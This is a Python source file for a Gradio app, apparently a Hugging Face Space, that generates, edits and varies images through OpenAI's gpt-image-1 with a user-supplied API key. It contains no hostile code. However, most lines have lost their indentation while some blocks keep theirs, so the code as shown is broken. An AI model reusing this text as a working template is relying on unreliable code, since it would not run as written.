from __future__ import annotations
import io
import json
import os
from typing import List, Optional, Union, Dict, Any
import gradio as gr
import numpy as np
from PIL import Image
import openai
# --- Constants and Helper Functions ---
MODEL = "gpt-image-1"
SIZE_CHOICES = ["auto", "1024x1024", "1536x1024", "1024x1536"]
QUALITY_CHOICES = ["auto", "low", "medium", "high"]
FORMAT_CHOICES = ["png", "jpeg", "webp"]
def _client(key: str) -> openai.OpenAI:
"""Initializes the OpenAI client with the provided API key."""
api_key = key.strip() or os.getenv("OPENAI_API_KEY", "")
    # Optional debug output, configurable via the `sys_info` environment variable
    # so the Space does not have to be rebuilt for every issue.
    sys_info_formatted = os.getenv("sys_info")  # e.g. "[DEBUG]: gpt-image-1"
    if sys_info_formatted:
        print(sys_info_formatted)
if not api_key:
raise gr.Error("Please enter your OpenAI API key (never stored)")
return openai.OpenAI(api_key=api_key)
def _img_list(resp, *, fmt: str) -> List[str]:
"""Return list of data URLs or direct URLs depending on API response."""
mime = f"image/{fmt}"
return [
f"data:{mime};base64,{d.b64_json}" if hasattr(d, "b64_json") and d.b64_json else d.url
for d in resp.data
]
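# Illustrative example (hypothetical values) of what _img_list returns for two
# base64-encoded PNG results; entries fall back to plain URLs when the API
# returns `url` instead of `b64_json`:
#   ["data:image/png;base64,iVBORw0...", "data:image/png;base64,iVBORw0..."]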
def _common_kwargs(
prompt: Optional[str],
n: int,
size: str,
quality: str,
out_fmt: str,
compression: int,
transparent_bg: bool,
) -> Dict[str, Any]:
"""Prepare keyword arguments for Images API based on latest OpenAI spec."""
kwargs: Dict[str, Any] = dict(
model=MODEL,
n=n,
)
if size != "auto":
kwargs["size"] = size
if quality != "auto":
kwargs["quality"] = quality
if prompt is not None:
kwargs["prompt"] = prompt
if out_fmt != "png":
kwargs["output_format"] = out_fmt
    if transparent_bg and out_fmt in {"png", "webp"}:
        # Transparent backgrounds only make sense for formats with an alpha channel;
        # `background` is the parameter name used by the current Images API.
        kwargs["background"] = "transparent"
    if out_fmt in {"jpeg", "webp"}:
        # Compression only applies to lossy/compressible formats;
        # `output_compression` is the parameter name used by the current Images API.
        kwargs["output_compression"] = int(compression)
return kwargs
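# Illustrative example (not executed) of the kwargs this helper builds, tracing
# the branches above:
#   _common_kwargs("a red fox", 2, "1024x1024", "high", "webp", 80, True)
#   -> {"model": "gpt-image-1", "n": 2, "size": "1024x1024", "quality": "high",
#       "prompt": "a red fox", "output_format": "webp",
#       "background": "transparent", "output_compression": 80}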
# --- Helper Function to Format OpenAI Errors ---
def _format_openai_error(e: Exception) -> str:
"""Formats OpenAI API errors for user display."""
error_message = f"An error occurred: {type(e).__name__}"
details = ""
# Try to extract details from common OpenAI error attributes
if hasattr(e, 'body') and e.body:
try:
body = e.body if isinstance(e.body, dict) else json.loads(str(e.body))
if isinstance(body, dict) and 'error' in body and isinstance(body['error'], dict) and 'message' in body['error']:
details = body['error']['message']
elif isinstance(body, dict) and 'message' in body: # Some errors might have message at top level
details = body['message']
except (json.JSONDecodeError, TypeError):
# Fallback if body is not JSON or parsing fails
details = str(e.body)
elif hasattr(e, 'message') and e.message:
details = e.message
if details:
error_message = f"OpenAI API Error: {details}"
else:
# Generic fallback if no specific details found
error_message = f"An unexpected OpenAI error occurred: {str(e)}"
# Add specific guidance for known error types
if isinstance(e, openai.AuthenticationError):
error_message = "Invalid OpenAI API key. Please check your key."
elif isinstance(e, openai.PermissionDeniedError):
# Prepend standard advice, then add specific details if available
prefix = "Permission Denied."
if "organization verification" in details.lower():
prefix += " Your organization may need verification to use this feature/model."
else:
prefix += " Check your API key permissions and OpenAI account status."
error_message = f"{prefix} Details: {details}" if details else prefix
elif isinstance(e, openai.RateLimitError):
error_message = "Rate limit exceeded. Please wait and try again later."
elif isinstance(e, openai.BadRequestError):
error_message = f"OpenAI Bad Request: {details}" if details else f"OpenAI Bad Request: {str(e)}"
if "mask" in details.lower(): error_message += " (Check mask format/dimensions)"
if "size" in details.lower(): error_message += " (Check image/mask dimensions)"
if "model does not support variations" in details.lower(): error_message += " (gpt-image-1 does not support variations)."
# Ensure the final message isn't overly long or complex
# (Optional: Truncate if necessary)
# MAX_LEN = 300
# if len(error_message) > MAX_LEN:
# error_message = error_message[:MAX_LEN] + "..."
return error_message
# ---------- Generate ---------- #
def generate(
api_key: str,
prompt: str,
n: int,
size: str,
quality: str,
out_fmt: str,
compression: int,
transparent_bg: bool,
):
"""Calls the OpenAI image generation endpoint."""
if not prompt:
raise gr.Error("Please enter a prompt.")
try:
client = _client(api_key) # API key used here
common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
# --- Optional Debug ---
# print(f"[DEBUG] Generating with args: {common_args}")
# --- End Optional Debug ---
resp = client.images.generate(**common_args)
except (openai.APIError, openai.OpenAIError) as e:
# Catch specific OpenAI errors and format them
raise gr.Error(_format_openai_error(e))
except Exception as e:
# Catch any other unexpected errors
# Avoid raising raw exception details to the user interface for security/clarity
print(f"Unexpected error during generation: {type(e).__name__}: {e}") # Log for debugging
raise gr.Error(f"An unexpected application error occurred. Please check logs.")
return _img_list(resp, fmt=out_fmt)
# ---------- Edit / Inpaint ---------- #
def _bytes_from_numpy(arr: np.ndarray) -> bytes:
"""Convert RGBA/RGB uint8 numpy array to PNG bytes."""
img = Image.fromarray(arr.astype(np.uint8))
out = io.BytesIO()
img.save(out, format="PNG")
return out.getvalue()
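# Illustrative usage (hypothetical array) showing the round trip expected by the
# edit/variation endpoints, which take raw PNG bytes for `image` and `mask`:
#   png_bytes = _bytes_from_numpy(np.zeros((512, 512, 4), dtype=np.uint8))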
def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]:
    """Handle ImageMask / ImageEditor return formats and extract a numpy mask array."""
    if mask_value is None:
        return None
    if isinstance(mask_value, dict):
        # Older Gradio ImageMask payloads: {'image': np.ndarray, 'mask': np.ndarray}
        mask_array = mask_value.get("mask")
        if isinstance(mask_array, np.ndarray):
            return mask_array
        # Newer (4.x) editor components return {'background', 'layers', 'composite'};
        # the painted strokes live in the first layer.
        layers = mask_value.get("layers")
        if isinstance(layers, (list, tuple)) and layers and isinstance(layers[0], np.ndarray):
            return layers[0]
    # Fallback for a direct numpy array
    if isinstance(mask_value, np.ndarray):
        return mask_value
    return None  # No valid mask found
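# Illustrative example (an assumption about the component's "numpy" payload;
# exact keys vary by Gradio version) of a value _extract_mask_array can handle:
#   {"image": <H x W x 3 uint8 array>, "mask": <H x W x 4 uint8 array>}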
def edit_image(
api_key: str,
# Gradio Image component with type="numpy" provides the image array
image_numpy: Optional[np.ndarray],
    # Gradio ImageMask provides a dict; the exact keys depend on the Gradio version
    # (see _extract_mask_array)
mask_dict: Optional[Dict[str, Any]],
prompt: str,
n: int,
size: str,
quality: str,
out_fmt: str,
compression: int,
transparent_bg: bool,
):
"""Calls the OpenAI image edit endpoint."""
if image_numpy is None: raise gr.Error("Please upload an image.")
if not prompt: raise gr.Error("Please enter an edit prompt.")
img_bytes = _bytes_from_numpy(image_numpy)
mask_bytes: Optional[bytes] = None
mask_numpy = _extract_mask_array(mask_dict) # Use the helper
if mask_numpy is not None:
# Check if mask is effectively empty (all transparent or all black)
is_empty = False
if mask_numpy.ndim == 2: # Grayscale mask
is_empty = np.all(mask_numpy == 0)
elif mask_numpy.shape[-1] == 4: # RGBA mask, check alpha channel
is_empty = np.all(mask_numpy[:, :, 3] == 0)
elif mask_numpy.shape[-1] == 3: # RGB mask, check if all black
is_empty = np.all(mask_numpy == 0)
if is_empty:
gr.Warning("Mask appears empty or fully transparent. The API might edit the entire image or ignore the mask.")
mask_bytes = None # Treat as no mask if empty
else:
# Convert the mask provided by Gradio (often white on black/transparent)
# to the format OpenAI expects (transparency indicates where *not* to edit).
# We need an RGBA image where the area to be *edited* is transparent.
if mask_numpy.ndim == 2: # Grayscale (assume white is edit area)
                alpha = (mask_numpy < 128).astype(np.uint8) * 255  # Dark (non-edit) pixels become opaque (alpha 255)
elif mask_numpy.shape[-1] == 4: # RGBA (use alpha channel directly)
alpha = mask_numpy[:, :, 3]
# Invert alpha: transparent where user painted (edit area), opaque elsewhere
alpha = 255 - alpha
elif mask_numpy.shape[-1] == 3: # RGB (assume white is edit area)
# Check if close to white [255, 255, 255]
is_edit_area = np.all(mask_numpy > 200, axis=-1)
                alpha = (~is_edit_area).astype(np.uint8) * 255  # Non-edit pixels become opaque (alpha 255)
else:
raise gr.Error("Unsupported mask format received from Gradio component.")
# Create a valid RGBA PNG mask for OpenAI
mask_img = Image.fromarray(alpha, mode='L')
# Ensure mask size matches image size (OpenAI requirement)
original_pil_image = Image.fromarray(image_numpy)
if mask_img.size != original_pil_image.size:
gr.Warning(f"Mask size {mask_img.size} differs from image size {original_pil_image.size}. Resizing mask...")
mask_img = mask_img.resize(original_pil_image.size, Image.NEAREST)
# Create RGBA image with the calculated alpha
rgba_mask = Image.new("RGBA", mask_img.size, (0, 0, 0, 0)) # Start fully transparent
rgba_mask.putalpha(mask_img) # Apply the alpha channel (non-edit areas are opaque)
out = io.BytesIO()
rgba_mask.save(out, format="PNG")
mask_bytes = out.getvalue()
else:
gr.Info("No mask provided or mask is empty. Editing without a specific mask (may replace entire image).")
mask_bytes = None
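    # Worked example of the inversion above (illustrative): a pixel the user
    # painted (alpha 255 in the Gradio mask) ends up with alpha 0 in the uploaded
    # mask, i.e. transparent, which the edits endpoint treats as the region to
    # regenerate; unpainted pixels stay opaque and are preserved.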
try:
client = _client(api_key) # API key used here
common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
api_kwargs = {"image": img_bytes, **common_args}
if mask_bytes is not None:
api_kwargs["mask"] = mask_bytes
        # When mask_bytes is None the 'mask' parameter is simply omitted and the
        # edits endpoint applies the prompt to the whole image.
# --- Optional Debug ---
# print(f"[DEBUG] Editing with args: { {k: v if k != 'image' and k != 'mask' else f'<{len(v)} bytes>' for k, v in api_kwargs.items()} }")
# --- End Optional Debug ---
resp = client.images.edit(**api_kwargs)
except (openai.APIError, openai.OpenAIError) as e:
raise gr.Error(_format_openai_error(e))
except Exception as e:
print(f"Unexpected error during edit: {type(e).__name__}: {e}")
raise gr.Error(f"An unexpected application error occurred. Please check logs.")
return _img_list(resp, fmt=out_fmt)
# ---------- Variations ---------- #
def variation_image(
api_key: str,
image_numpy: Optional[np.ndarray],
n: int,
size: str,
quality: str,
out_fmt: str,
compression: int,
transparent_bg: bool,
):
"""Calls the OpenAI image variations endpoint."""
# Explicitly warn user about model compatibility
gr.Warning("Note: Image Variations are officially supported for DALL·E 2/3, not gpt-image-1. This may fail or produce unexpected results.")
if image_numpy is None: raise gr.Error("Please upload an image.")
img_bytes = _bytes_from_numpy(image_numpy)
try:
client = _client(api_key) # API key used here
        # The variations endpoint does not take a prompt, quality, background, or
        # compression; it mainly supports `n` and `size` (check the Images API docs
        # for the exact parameters supported by the target model).
var_args: Dict[str, Any] = dict(model=MODEL, n=n) # Use the selected model
if size != "auto":
var_args["size"] = size
        # The variations endpoint does not support `output_format`; request base64
        # data so results render consistently in the gallery regardless of format.
        var_args["response_format"] = "b64_json"
# --- Optional Debug ---
# print(f"[DEBUG] Variations with args: { {k: v if k != 'image' else f'<{len(v)} bytes>' for k, v in var_args.items()} }")
# --- End Optional Debug ---
# Use the simplified args
resp = client.images.create_variation(image=img_bytes, **var_args)
except (openai.APIError, openai.OpenAIError) as e:
raise gr.Error(_format_openai_error(e))
except Exception as e:
print(f"Unexpected error during variation: {type(e).__name__}: {e}")
raise gr.Error(f"An unexpected application error occurred. Please check logs.")
# Variations response format might differ slightly, adjust _img_list if needed
# Assuming it's the same structure for now.
return _img_list(resp, fmt=out_fmt)
# ---------- UI ---------- #
def build_ui():
with gr.Blocks(title="GPT-Image-1 (BYOT)") as demo:
gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit (paint mask!) • Variations""")
gr.Markdown(
"Enter your OpenAI API key below. It's used directly for API calls and **never stored**."
" This space uses the `gpt-image-1` model by default."
" **Note:** Using `gpt-image-1` may require **Organization Verification** on your OpenAI account ([details](https://help.openai.com/en/articles/10910291-api-organization-verification)). The **Variations** tab is unlikely to work correctly with `gpt-image-1` (designed for DALL·E 2/3)."
)
with gr.Accordion("🔐 API key", open=False):
api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...")
# Common controls
with gr.Row():
n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)", info="Max 4 for this demo.")
size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size", info="API default if 'auto'. Affects Gen/Edit/Var.")
quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality", info="API default if 'auto'. Affects Gen/Edit.")
with gr.Row():
out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format", info="Affects Gen/Edit.", scale=1)
# Note: Compression/Transparency might not apply to all models/endpoints equally.
# Check OpenAI docs for gpt-image-1 specifics if issues arise.
compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, scale=2)
transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", info="Affects Gen/Edit.", scale=1)
def _toggle_compression(fmt):
return gr.update(visible=fmt in {"jpeg", "webp"})
out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression)
# Define the list of common controls *excluding* the API key
# These are passed to the backend functions
common_controls_gen_edit = [n_slider, size, quality, out_fmt, compression, transparent]
# Variations might use fewer controls
common_controls_var = [n_slider, size, quality, out_fmt, compression, transparent] # Pass all for now, function will ignore unused
with gr.Tabs():
# ----- Generate Tab ----- #
with gr.TabItem("Generate"):
with gr.Row():
prompt_gen = gr.Textbox(label="Prompt", lines=3, placeholder="A photorealistic ginger cat astronaut on Mars", scale=4)
btn_gen = gr.Button("Generate 🚀", variant="primary", scale=1)
gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True)
btn_gen.click(
generate,
# API key first, then specific inputs, then common controls
inputs=[api, prompt_gen] + common_controls_gen_edit,
outputs=gallery_gen,
api_name="generate"
)
# ----- Edit Tab ----- #
with gr.TabItem("Edit / Inpaint"):
gr.Markdown("Upload an image, then **paint the area to change** in the mask canvas below (white paint = edit area). The API requires the mask and image to have the same dimensions (app attempts to resize mask if needed).")
with gr.Row():
                    # type="numpy" so the backend helpers receive arrays directly
                    img_edit = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"])
                    # ImageMask returns a dict; _extract_mask_array handles both the legacy
                    # {'image', 'mask'} layout and newer layer-based layouts.
mask_canvas = gr.ImageMask(
label="Mask – Paint White Where Image Should Change",
type="numpy", # Keep numpy as _extract_mask_array expects it
height=400
)
with gr.Row():
prompt_edit = gr.Textbox(label="Edit prompt", lines=2, placeholder="Replace the sky with a starry night", scale=4)
btn_edit = gr.Button("Edit 🖌️", variant="primary", scale=1)
gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True)
btn_edit.click(
edit_image,
# API key first, then specific inputs, then common controls
inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls_gen_edit,
outputs=gallery_edit,
api_name="edit"
)
# ----- Variations Tab ----- #
with gr.TabItem("Variations (DALL·E 2/3 Recommended)"):
gr.Markdown("Upload an image to generate variations. **Warning:** This endpoint is officially supported for DALL·E 2/3, not `gpt-image-1`. It likely won't work correctly or may error.")
with gr.Row():
img_var = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"], scale=4)
btn_var = gr.Button("Create Variations ✨", variant="primary", scale=1)
gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True)
btn_var.click(
variation_image,
# API key first, then specific inputs, then common controls
inputs=[api, img_var] + common_controls_var,
outputs=gallery_var,
api_name="variations"
)
return demo
if __name__ == "__main__":
app = build_ui()
    # Sharing and debug mode are controlled via the GRADIO_SHARE / GRADIO_DEBUG env vars.
app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=os.getenv("GRADIO_DEBUG") == "true")